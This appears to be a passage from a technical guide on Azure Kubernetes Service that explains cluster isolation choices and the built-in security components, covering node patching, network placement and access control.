Logical isolation can help minimize costs by enabling autoscaling and running only the number of nodes required at any one time. Physical isolation is usually selected for hostile multitenant environments, where you want to fully prevent one tenant from affecting the security and service of another. Physical isolation means that you physically separate AKS clusters, assigning each team or workload its own AKS cluster. Although this approach usually makes isolation simpler, it adds management and financial overhead.



There are many built-in capabilities in AKS that help ensure your AKS cluster is secure. Those built-in capabilities are based on native Kubernetes features, such as network policies and secrets, with the addition of Azure components, such as NSG and orchestrated cluster upgrades.

These components work together to keep your AKS cluster running the latest OS security updates and Kubernetes releases, to secure pod traffic, and to provide secure access to sensitive credentials. Figure 1-14 shows a diagram with the core AKS security components.

FIGURE 1-14 Core AKS security components

When you deploy AKS in Azure, the Kubernetes master components are part of the managed service provided by Microsoft. Each AKS cluster has a dedicated Kubernetes master, which provides the API server, scheduler, and other control components. You can control access to the API server by using Kubernetes RBAC and Azure AD.

While the Kubernetes master is managed and maintained by Microsoft, the AKS nodes are VMs that you manage and maintain. These nodes can run Linux (an optimized Ubuntu distribution) or Windows Server 2019. The Azure platform automatically applies OS security patches to Linux nodes on a nightly basis. However, Windows Update does not automatically run or apply the latest updates on Windows nodes, so if you have Windows nodes, you need to plan a schedule around the update life cycle and enforce those updates yourself.

From the network perspective, these nodes are deployed into a private virtual network subnet, with no public IP addresses assigned to them. SSH is enabled by default but is reachable only through the internal IP address, and it should be used only for troubleshooting.